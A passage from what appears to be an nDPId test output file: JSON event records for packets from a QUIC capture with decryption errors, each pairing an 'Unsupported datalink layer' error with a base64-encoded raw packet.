9cJso9yCfZXrFbhGHBT59ywHTbQnV8MtvJ8GRtrDa8P07ZEo7R5LJZ4JNq6Q5pezM9dOBauLV633F6i5xwm\/Q8L98LZZjqgfz7FM5TVeepIuPXTRPpZhsBP7qQYU\/uzHCPNJV\/AH28yoTty9KUw0pT0FKk8ginZoZiQjDBcn3dtf5SkRTNUxPlPsE3PPD5SbikaAkWRKhjOymy2lRvuXUifZ9DX5GEnpkg9gtwFK5QfLnnbYk2YfQ4v2wy+BF3ewyH6QorBKtbv1iEP\/MMFBZZkvYNW5KfrefGJcZvEwlHW8oVgXeFXtucbGH7altb5lE1zQGRCa\/tnulRrvvLW2AFBOR8iLt0HQ+7mGzM9x0YwLCTg2BRLqXbM2EuqNNMo9kXdH+gdka+qRkbY6WRzIDbMosMswUZQHlCpxXxWkxCE6xXLm\/mNzNnrhDSkjxjrCV0gzCIZ\/Gwb0Ex9z7hE4ATqMWCm4cHhgejb1qFci6xb8sKTtehfHUuJLffAKnwR89whARXkciL4wFBrul505r+QHr6EtusI="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":341,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":341,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAO8J7AABAEUS1CuYoqF5h4ZLy9AG7ACdJ1lpAAkdWAc94e2jRUX5AGTYu7YrLiSQHm19DZZt5Dl8="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":342,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":342,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAO8J7AABAEUS1CuYoqF5h4ZLy9AG7ACdJ1lpAAkdWAc94e2jRUX5AGTYu7YrLiSQHm19DZZt5Dl8="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":343,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":343,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAO8J7AABAEUR9CuYoqF5h4ZLy9AG7ACdJ1lpAAkdWAc94e2jRUX5AGTYu7YrLiSQHm19DZZt5Dl8="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":344,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":344,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPHlTAABAEY3cCuYoqF5h4ZLy9AG7ACjnyklAAkdWAc94e94r8MnXowMQmr92EazX5UMXOX8SmOEk"} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":345,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":345,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPHlTAABAEY3cCuYoqF5h4ZLy9AG7ACjnyklAAkdWAc94e94r8MnXowMQmr92EazX5UMXOX8SmOEk"} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":346,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297033} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":346,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAPHlTAABAEY2kCuYoqF5h4ZLy9AG7ACjnyklAAkdWAc94e94r8MnXowMQmr92EazX5UMXOX8SmOEk"} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":347,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":347,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOzHc0XB5dtGDPWWdor+v7WYIEsIskFDLr2mbpTKerwSdrzVPd\/1QS6yzCDnuunxHqHmWphY0fkYbixrLKgSk3yTR\/ozQ05sbIg5ez2CxAeemwqnV8eJ76PXGZUJD3Wfguie6UNTy0dmkcyoMJd31dHOI3TVrk8enu4VAXxNcYWmUTWNoURH06j41bIEME798KMqr3qw77Vx8+CzwfGABgDJK7kSNf1qrg1yjCAOwQl2d4Uleaw4BuKN7TbAV4XoRoNk0f2Jvn6cuipqOe0O2OW7r1M1og7J5bdLwIvqxS+bXTVL5EwiOst1kb\/CU3ccFZEtQmUQAnsOleOT6+MacWCPbbjbHVnx2nRwL2\/AqjWPXV3e3fxvdhrGIi6kNgH0+uW4LJsYFgAXFGGjd64Q98W2laYgFwTcHX2Ld+b2lu8ezwF\/YzZ3c0JLKX+u4NDaMKjiuAaB0OLHOABpyoDD8sjT2jdOFVzdBA5ARj54ur5DoPnCKS1ipegfqtO6PYLpHUU6Fhsqhk\/T5u5UvuEpqBjFuUHZqr\/n44HZdYpSX8wkuYEGZsdPEcXSGIiSx8CluniDEylvMl5tKVNfzb3HvXcUx1SGS16yi3shkSz0gpV6IcbKIhnqUCzGEjdiyWnpBlciK6HeXfjr9dd5NP+h4mFUAAOU5nSGIB57r1sNrH9OLmtoA6ur3yraqth4hjJts97VIkdYNQdciJrYop2gyAdhNkfBkbvEFohoCBpXAZ+gDsV9xqKzVhzrusSR5NAVoWHd8RK0P\/IuYUOOoudt\/GE6TneyNwSwT0acYcpPRbPCPtoi2G7PDwMurF4Zsr7HbCtbuqxns9UhKvwkTGP6y3PZDSDYEENLCI1JFRbNwuVgn8jclWdDDpurFaOT6xkHdHCUJgGe6ZthDoCpe2b5s\/L5jOprI4sRZGabIkxU0VIdLdCDzZ3tQrgvzv\/N\/PCT959NFhwo0NskqYDZNConXLBCHCAXJuUG4ZstajnKeFiK\/wQI84hvt3rbQF0NGhGBfWj3bOJ5lvsvF2NIrAq2m\/+m3Wy\/e\/APiC\/uKXDGM6AbXsV5y1LLe8kdZLT4vwbT1+eec5qB4QTpzUA4uI\/iVQ6V+n5tEoygnim0rrXYARaSBHRibfR0mV\/5yCfeqe8IXSse5fURR1IdZlmJDat6\/RzqxBa5Vx5PoEXwVk5h9BKU0PQxl25tHRm2XXYvf6WOxT71zylAljO2h3trBowSPsz\/8cl2y85BXaAMwi0GnDYfXdMX2YGtUsx5pdxlXMMunadtU6yzGWK26I9+q+Qd63FBhmupg2GE5yzHe+JZwI9Eb7VbvPb\/O12oTNBjP67xqEXILVGKZeKBPu3OM8qK51tOzHPAuEOePEVe63ju88LW+65DRgk1tfF\/pkkYqljtIVyyKK49u0GAhS7Uj0GkBsqqZnGeU\/s7O7mvb0a\/jqxu98ep6nsYRs2o5JV1owme5toCH53X67hVClpihczOpfGg3ErKGziMSk9AHOzGwCQdr7D\/dziuScyCr0o3+GTxYh\/++0ZqwY0YbjfdkshWg+P01Qa+nDHQfp3FPdH1ZUoctxZ3JKKuMqJQlpzRI68Mb\/xAyYlncmqFJ3qDQU9iAgtlEsjuyDzekAcPbEjHOhzwjexhAKGobFkpu1Uq0CN5CIkg\/ZKlavI="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":348,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOzHc0XB5dtGDPWWdor+v7WYIEsIskFDLr2mbpTKerwSdrzVPd\/1QS6yzCDnuunxHqHmWphY0fkYbixrLKgSk3yTR\/ozQ05sbIg5ez2CxAeemwqnV8eJ76PXGZUJD3Wfguie6UNTy0dmkcyoMJd31dHOI3TVrk8enu4VAXxNcYWmUTWNoURH06j41bIEME798KMqr3qw77Vx8+CzwfGABgDJK7kSNf1qrg1yjCAOwQl2d4Uleaw4BuKN7TbAV4XoRoNk0f2Jvn6cuipqOe0O2OW7r1M1og7J5bdLwIvqxS+bXTVL5EwiOst1kb\/CU3ccFZEtQmUQAnsOleOT6+MacWCPbbjbHVnx2nRwL2\/AqjWPXV3e3fxvdhrGIi6kNgH0+uW4LJsYFgAXFGGjd64Q98W2laYgFwTcHX2Ld+b2lu8ezwF\/YzZ3c0JLKX+u4NDaMKjiuAaB0OLHOABpyoDD8sjT2jdOFVzdBA5ARj54ur5DoPnCKS1ipegfqtO6PYLpHUU6Fhsqhk\/T5u5UvuEpqBjFuUHZqr\/n44HZdYpSX8wkuYEGZsdPEcXSGIiSx8CluniDEylvMl5tKVNfzb3HvXcUx1SGS16yi3shkSz0gpV6IcbKIhnqUCzGEjdiyWnpBlciK6HeXfjr9dd5NP+h4mFUAAOU5nSGIB57r1sNrH9OLmtoA6ur3yraqth4hjJts97VIkdYNQdciJrYop2gyAdhNkfBkbvEFohoCBpXAZ+gDsV9xqKzVhzrusSR5NAVoWHd8RK0P\/IuYUOOoudt\/GE6TneyNwSwT0acYcpPRbPCPtoi2G7PDwMurF4Zsr7HbCtbuqxns9UhKvwkTGP6y3PZDSDYEENLCI1JFRbNwuVgn8jclWdDDpurFaOT6xkHdHCUJgGe6ZthDoCpe2b5s\/L5jOprI4sRZGabIkxU0VIdLdCDzZ3tQrgvzv\/N\/PCT959NFhwo0NskqYDZNConXLBCHCAXJuUG4ZstajnKeFiK\/wQI84hvt3rbQF0NGhGBfWj3bOJ5lvsvF2NIrAq2m\/+m3Wy\/e\/APiC\/uKXDGM6AbXsV5y1LLe8kdZLT4vwbT1+eec5qB4QTpzUA4uI\/iVQ6V+n5tEoygnim0rrXYARaSBHRibfR0mV\/5yCfeqe8IXSse5fURR1IdZlmJDat6\/RzqxBa5Vx5PoEXwVk5h9BKU0PQxl25tHRm2XXYvf6WOxT71zylAljO2h3trBowSPsz\/8cl2y85BXaAMwi0GnDYfXdMX2YGtUsx5pdxlXMMunadtU6yzGWK26I9+q+Qd63FBhmupg2GE5yzHe+JZwI9Eb7VbvPb\/O12oTNBjP67xqEXILVGKZeKBPu3OM8qK51tOzHPAuEOePEVe63ju88LW+65DRgk1tfF\/pkkYqljtIVyyKK49u0GAhS7Uj0GkBsqqZnGeU\/s7O7mvb0a\/jqxu98ep6nsYRs2o5JV1owme5toCH53X67hVClpihczOpfGg3ErKGziMSk9AHOzGwCQdr7D\/dziuScyCr0o3+GTxYh\/++0ZqwY0YbjfdkshWg+P01Qa+nDHQfp3FPdH1ZUoctxZ3JKKuMqJQlpzRI68Mb\/xAyYlncmqFJ3qDQU9iAgtlEsjuyDzekAcPbEjHOhzwjexhAKGobFkpu1Uq0CN5CIkg\/ZKlavI="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":349,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":349,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAAAQABZEakzXmHhkgrmKKgBu\/L0BOzHc0XB5dtGDPWWdor+v7WYIEsIskFDLr2mbpTKerwSdrzVPd\/1QS6yzCDnuunxHqHmWphY0fkYbixrLKgSk3yTR\/ozQ05sbIg5ez2CxAeemwqnV8eJ76PXGZUJD3Wfguie6UNTy0dmkcyoMJd31dHOI3TVrk8enu4VAXxNcYWmUTWNoURH06j41bIEME798KMqr3qw77Vx8+CzwfGABgDJK7kSNf1qrg1yjCAOwQl2d4Uleaw4BuKN7TbAV4XoRoNk0f2Jvn6cuipqOe0O2OW7r1M1og7J5bdLwIvqxS+bXTVL5EwiOst1kb\/CU3ccFZEtQmUQAnsOleOT6+MacWCPbbjbHVnx2nRwL2\/AqjWPXV3e3fxvdhrGIi6kNgH0+uW4LJsYFgAXFGGjd64Q98W2laYgFwTcHX2Ld+b2lu8ezwF\/YzZ3c0JLKX+u4NDaMKjiuAaB0OLHOABpyoDD8sjT2jdOFVzdBA5ARj54ur5DoPnCKS1ipegfqtO6PYLpHUU6Fhsqhk\/T5u5UvuEpqBjFuUHZqr\/n44HZdYpSX8wkuYEGZsdPEcXSGIiSx8CluniDEylvMl5tKVNfzb3HvXcUx1SGS16yi3shkSz0gpV6IcbKIhnqUCzGEjdiyWnpBlciK6HeXfjr9dd5NP+h4mFUAAOU5nSGIB57r1sNrH9OLmtoA6ur3yraqth4hjJts97VIkdYNQdciJrYop2gyAdhNkfBkbvEFohoCBpXAZ+gDsV9xqKzVhzrusSR5NAVoWHd8RK0P\/IuYUOOoudt\/GE6TneyNwSwT0acYcpPRbPCPtoi2G7PDwMurF4Zsr7HbCtbuqxns9UhKvwkTGP6y3PZDSDYEENLCI1JFRbNwuVgn8jclWdDDpurFaOT6xkHdHCUJgGe6ZthDoCpe2b5s\/L5jOprI4sRZGabIkxU0VIdLdCDzZ3tQrgvzv\/N\/PCT959NFhwo0NskqYDZNConXLBCHCAXJuUG4ZstajnKeFiK\/wQI84hvt3rbQF0NGhGBfWj3bOJ5lvsvF2NIrAq2m\/+m3Wy\/e\/APiC\/uKXDGM6AbXsV5y1LLe8kdZLT4vwbT1+eec5qB4QTpzUA4uI\/iVQ6V+n5tEoygnim0rrXYARaSBHRibfR0mV\/5yCfeqe8IXSse5fURR1IdZlmJDat6\/RzqxBa5Vx5PoEXwVk5h9BKU0PQxl25tHRm2XXYvf6WOxT71zylAljO2h3trBowSPsz\/8cl2y85BXaAMwi0GnDYfXdMX2YGtUsx5pdxlXMMunadtU6yzGWK26I9+q+Qd63FBhmupg2GE5yzHe+JZwI9Eb7VbvPb\/O12oTNBjP67xqEXILVGKZeKBPu3OM8qK51tOzHPAuEOePEVe63ju88LW+65DRgk1tfF\/pkkYqljtIVyyKK49u0GAhS7Uj0GkBsqqZnGeU\/s7O7mvb0a\/jqxu98ep6nsYRs2o5JV1owme5toCH53X67hVClpihczOpfGg3ErKGziMSk9AHOzGwCQdr7D\/dziuScyCr0o3+GTxYh\/++0ZqwY0YbjfdkshWg+P01Qa+nDHQfp3FPdH1ZUoctxZ3JKKuMqJQlpzRI68Mb\/xAyYlncmqFJ3qDQU9iAgtlEsjuyDzekAcPbEjHOhzwjexhAKGobFkpu1Uq0CN5CIkg\/ZKlavI="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":350,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAABQABZEalqXmHhkgrmKKgBu\/L0BOz\/LUEKQ\/69OwU7YOoEjfCU6PYIxZC0bpOhRpIoJJm+nxm46Oz7TPDsxFM7UHGJ5QaLSAhKzf2tpv2a5HzpBrqxZkSiLpkvtW4REvRhAhMuGxbt9FhZxZhIHGF10o7mZCkliyT+CXM+wsY5COnoW+BioHtzhcAIc1SFAJXC1KaM4VSZ8ASaGOMzV5qkDoWkMVkVXkOQ6Yl0LTSr13A63bczUxZ4x\/9td8rT9Hih4juaIs3wtx9OzII0pSe3pRJ8v5nPbycL23JcZMUYkOHwsu6clqBLaiq9uzdv\/UkVQvFLr6BSmz4hV8TUAuFVhlk3oYZs2jy6Lnt6JtjR5ON6UxO+amg\/oXRpYjT7\/s\/82ystuT3XOoq+c2sx+PqlbFaAug8yBeIXxzjgp2lJo8Dn7cBzcAWmBsn20IcWplQu\/4hhDQmNTcs9lGvcgAxJnM2csmvsuDDIgjoxXBsAJnRdBG4F9LcE1hvwc+6XBsAWPKCOhWZx77O45loQ1gYuo+R3lDHAKf90QLuXSeqS7ySxVsrZ+L7a1\/2Tl73hPIILFiYSrVVCHzHYbgEUR2FnZ4qJgdQANm6k7VQ0rAPZS4Ff7rLCFjiBY2VdunBzvH6VM\/NX+cTlx1jb7f7Wh6sAmS0N0688HZF+ZdGgNb1St2MKd3xCgefqsoo9gdXG2luGBB8uIrpDx8vlKjebGmswm82uvSnkBm88PHSXeyNp1Ioepnm4O68qayYBVG+iAtGK\/h2X8G6Wg+5WHs2CPDKp010y+tL4bXI\/jK\/L89DvTSjGtCgSvLSk26jjus8LpnO9B\/aHf6B01+\/SmQOwjduO6DVQTR6pMffT98puv41RE2MWaIXsUJ3OateqyC7GqFBCr9HOvE5\/NIl6bGlJXUzDzbdQLmwoz9sYVr6PF6GsR1JU2ugkt3UmReS2wXdOSS9hXah6T42MrRWMXe\/ARn13rDog1mp9T6XY8r0PSZfoQyBd2qN5kdphBGqJIpIMqN5J4YQPdQczKr5yScja69FMzXUv3N7x5BcJ8byhRJO6AE6UTdr30x\/vsJ1+Loriv8M8xjI3b2XXY6HpYOirlmqm5b69wcLMv2kF4rqgcmgYFz11w4Pqsb5ucrmsiLJ0fFoUoiv8B22nMAg3lMihc214tPUWdMLyVUp0SBD+8AedmwVe8ClnTE+67lkrkpE5ZoIiAmqghJWQAsp\/3+zrUNinfvOtmp5KRe7g+ixZkqfSbN3\/O7\/rrF8qj03MiOryAEcKIDOVs0otnfjQQDIcHrixxFrXIPPdGeo\/XNXdT3rturTw5WbN\/T7ZNRDVoUCZkojyCHGSq+6jEEoijN1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLTs7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":351,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":351,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAABQABZEalqXmHhkgrmKKgBu\/L0BOz\/LUEKQ\/69OwU7YOoEjfCU6PYIxZC0bpOhRpIoJJm+nxm46Oz7TPDsxFM7UHGJ5QaLSAhKzf2tpv2a5HzpBrqxZkSiLpkvtW4REvRhAhMuGxbt9FhZxZhIHGF10o7mZCkliyT+CXM+wsY5COnoW+BioHtzhcAIc1SFAJXC1KaM4VSZ8ASaGOMzV5qkDoWkMVkVXkOQ6Yl0LTSr13A63bczUxZ4x\/9td8rT9Hih4juaIs3wtx9OzII0pSe3pRJ8v5nPbycL23JcZMUYkOHwsu6clqBLaiq9uzdv\/UkVQvFLr6BSmz4hV8TUAuFVhlk3oYZs2jy6Lnt6JtjR5ON6UxO+amg\/oXRpYjT7\/s\/82ystuT3XOoq+c2sx+PqlbFaAug8yBeIXxzjgp2lJo8Dn7cBzcAWmBsn20IcWplQu\/4hhDQmNTcs9lGvcgAxJnM2csmvsuDDIgjoxXBsAJnRdBG4F9LcE1hvwc+6XBsAWPKCOhWZx77O45loQ1gYuo+R3lDHAKf90QLuXSeqS7ySxVsrZ+L7a1\/2Tl73hPIILFiYSrVVCHzHYbgEUR2FnZ4qJgdQANm6k7VQ0rAPZS4Ff7rLCFjiBY2VdunBzvH6VM\/NX+cTlx1jb7f7Wh6sAmS0N0688HZF+ZdGgNb1St2MKd3xCgefqsoo9gdXG2luGBB8uIrpDx8vlKjebGmswm82uvSnkBm88PHSXeyNp1Ioepnm4O68qayYBVG+iAtGK\/h2X8G6Wg+5WHs2CPDKp010y+tL4bXI\/jK\/L89DvTSjGtCgSvLSk26jjus8LpnO9B\/aHf6B01+\/SmQOwjduO6DVQTR6pMffT98puv41RE2MWaIXsUJ3OateqyC7GqFBCr9HOvE5\/NIl6bGlJXUzDzbdQLmwoz9sYVr6PF6GsR1JU2ugkt3UmReS2wXdOSS9hXah6T42MrRWMXe\/ARn13rDog1mp9T6XY8r0PSZfoQyBd2qN5kdphBGqJIpIMqN5J4YQPdQczKr5yScja69FMzXUv3N7x5BcJ8byhRJO6AE6UTdr30x\/vsJ1+Loriv8M8xjI3b2XXY6HpYOirlmqm5b69wcLMv2kF4rqgcmgYFz11w4Pqsb5ucrmsiLJ0fFoUoiv8B22nMAg3lMihc214tPUWdMLyVUp0SBD+8AedmwVe8ClnTE+67lkrkpE5ZoIiAmqghJWQAsp\/3+zrUNinfvOtmp5KRe7g+ixZkqfSbN3\/O7\/rrF8qj03MiOryAEcKIDOVs0otnfjQQDIcHrixxFrXIPPdGeo\/XNXdT3rturTw5WbN\/T7ZNRDVoUCZkojyCHGSq+6jEEoijN1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLTs7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":352,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02019{"packet_event_id":1,"packet_event_name":"packet","packet_id":352,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAABQABZEakyXmHhkgrmKKgBu\/L0BOz\/LUEKQ\/69OwU7YOoEjfCU6PYIxZC0bpOhRpIoJJm+nxm46Oz7TPDsxFM7UHGJ5QaLSAhKzf2tpv2a5HzpBrqxZkSiLpkvtW4REvRhAhMuGxbt9FhZxZhIHGF10o7mZCkliyT+CXM+wsY5COnoW+BioHtzhcAIc1SFAJXC1KaM4VSZ8ASaGOMzV5qkDoWkMVkVXkOQ6Yl0LTSr13A63bczUxZ4x\/9td8rT9Hih4juaIs3wtx9OzII0pSe3pRJ8v5nPbycL23JcZMUYkOHwsu6clqBLaiq9uzdv\/UkVQvFLr6BSmz4hV8TUAuFVhlk3oYZs2jy6Lnt6JtjR5ON6UxO+amg\/oXRpYjT7\/s\/82ystuT3XOoq+c2sx+PqlbFaAug8yBeIXxzjgp2lJo8Dn7cBzcAWmBsn20IcWplQu\/4hhDQmNTcs9lGvcgAxJnM2csmvsuDDIgjoxXBsAJnRdBG4F9LcE1hvwc+6XBsAWPKCOhWZx77O45loQ1gYuo+R3lDHAKf90QLuXSeqS7ySxVsrZ+L7a1\/2Tl73hPIILFiYSrVVCHzHYbgEUR2FnZ4qJgdQANm6k7VQ0rAPZS4Ff7rLCFjiBY2VdunBzvH6VM\/NX+cTlx1jb7f7Wh6sAmS0N0688HZF+ZdGgNb1St2MKd3xCgefqsoo9gdXG2luGBB8uIrpDx8vlKjebGmswm82uvSnkBm88PHSXeyNp1Ioepnm4O68qayYBVG+iAtGK\/h2X8G6Wg+5WHs2CPDKp010y+tL4bXI\/jK\/L89DvTSjGtCgSvLSk26jjus8LpnO9B\/aHf6B01+\/SmQOwjduO6DVQTR6pMffT98puv41RE2MWaIXsUJ3OateqyC7GqFBCr9HOvE5\/NIl6bGlJXUzDzbdQLmwoz9sYVr6PF6GsR1JU2ugkt3UmReS2wXdOSS9hXah6T42MrRWMXe\/ARn13rDog1mp9T6XY8r0PSZfoQyBd2qN5kdphBGqJIpIMqN5J4YQPdQczKr5yScja69FMzXUv3N7x5BcJ8byhRJO6AE6UTdr30x\/vsJ1+Loriv8M8xjI3b2XXY6HpYOirlmqm5b69wcLMv2kF4rqgcmgYFz11w4Pqsb5ucrmsiLJ0fFoUoiv8B22nMAg3lMihc214tPUWdMLyVUp0SBD+8AedmwVe8ClnTE+67lkrkpE5ZoIiAmqghJWQAsp\/3+zrUNinfvOtmp5KRe7g+ixZkqfSbN3\/O7\/rrF8qj03MiOryAEcKIDOVs0otnfjQQDIcHrixxFrXIPPdGeo\/XNXdT3rturTw5WbN\/T7ZNRDVoUCZkojyCHGSq+6jEEoijN1F2WOeBaQk\/9OE5UvfkN\/r3ew5dBxJn7UeNtS6rQ6gpPlYGbk8rUIIk2X5DqTqywbIe+RRiAuXYogwHvBaICuBnHfCM4wLTs7WZY+xJ7wiOlrjzYZvWZ9+r8Vip7nUVupQLi7sKHDfUAs9w8qngy9zGa5N55ILdyVFSStLbilI\/iUXT7Tr9z+Cx4eECmVq3sUzbveAsOaoWqQkCuLcGZ\/r3b9\/045kgK0m5LNouE+KaDM6gbEl25MY6AnLD8wZtHVXWVADD+fBzWPy+iywEnphzQirOW\/3upT7dSCactXPxZrNxFWfPymhPYu0Krc2ivZ465hUCU0ekKodOQt6rIA="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498297036} -02015{"packet_event_id":1,"packet_event_name":"packet","packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAACQABZEalpXmHhkgrmKKgBu\/L0BOxzEVh\/\/F+FsvgskZSJEq72gHo10TdgNOHV3qtvLr34ysT4\/BQu08NXy68awukgm428CY+3uFIa\/SsYHOQWYv\/6hMCX46sHEfK3FsGd9B4aOMTDZmbct0Hi6B5hFbC0RysqpiuCGv72ybkRYMTkkmBSpKkaxMd628mXMhcYd517jH\/CS6rxLyjH721TKnNGFMFZJpKZW05u1pmo9F74UGjuzXEO89ZOXqanGwo8ZLmQTCj85x1E1RZX9aigKv5BEr63ws6yLhHIXtPDYscZDNmE2ULVjoz3kzJuZzMzTW64HxXlwsMaX6uzVAwAX\/DVkW2gqZT9R4oqnG1iUCq0cb0MR6letAQ\/fU12ToEri5STxN\/eLewgY07DxQqjTUjGstGtGCNM\/FfDTgRtPzwTJZih3hD1CfW1YEkB9tXv3wCFGUyLRPlE7MbrU8qTOcUAn41czqUHKXgJpSWqjRlqdsmuAgafgOGhqdjw1Dm38vteZONnaZ0QujAZ7ZN3UoLVU\/0h2yR1MEUH\/ATH25T5lgD9ffI\/fHDa86FcEH0enSe06V9t2jUIcvqLGVwSzjxtjTGJjrQ5mZ9ZuX\/RsW9eLUa5XcOl6q9p1sCAM956+nfVkS7tt1A7eldJbVXEI+ZcnDnBu\/HfhQghjRReyowO0uY88d1b6J5BW747Za2CrWV3An3xcrcgJ3r7Eegcow70EpRrR+5W8ayOPOR2SGTCLovooC